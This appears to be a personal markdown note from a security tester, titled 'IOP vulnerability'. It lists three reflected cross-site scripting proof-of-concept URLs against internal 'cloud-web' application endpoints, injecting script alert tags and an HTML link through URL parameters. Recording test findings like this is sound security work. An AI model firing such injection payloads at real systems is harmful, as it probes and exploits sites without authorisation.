createdAt: "2018-01-31T06:17:31.362Z"
updatedAt: "2018-02-02T09:23:00.992Z"
type: "MARKDOWN_NOTE"
folder: "66dff0cfbfde06f3d2e8"
title: "IOP漏洞"
content: '''
  IOP漏洞
  `
  http://10.110.22.12/cloud-web/#/login/dev?callback="><script>alert(/456/);</script>`
  
  
  `
  http://10.110.20.209/cloud-web/#/aservice/appmanager/app/detail?id=79526e7c73e64550b2de195e065212fa&appSpaceId=90d53c66362f4c64a04c6c6544effe5d&ownerId=1076161ce0c2401c86e04570757369a9&appName=cdtest&programType=java&name=test"><a href="http://www.baidu.com">aaaa</a>
  `
  
  `
  http://10.110.20.209/cloud-web/#/aservice/appmanager/app/detail?id=79526e7c73e64550b2de195e065212fa&appSpaceId=90d53c66362f4c64a04c6c6544effe5d&ownerId=1076161ce0c2401c86e04570757369a9&appName=cdtest&programType=java&name=test"><script>alert(/456/);</script>
  `
'''
tags: []
isStarred: false
isTrashed: false
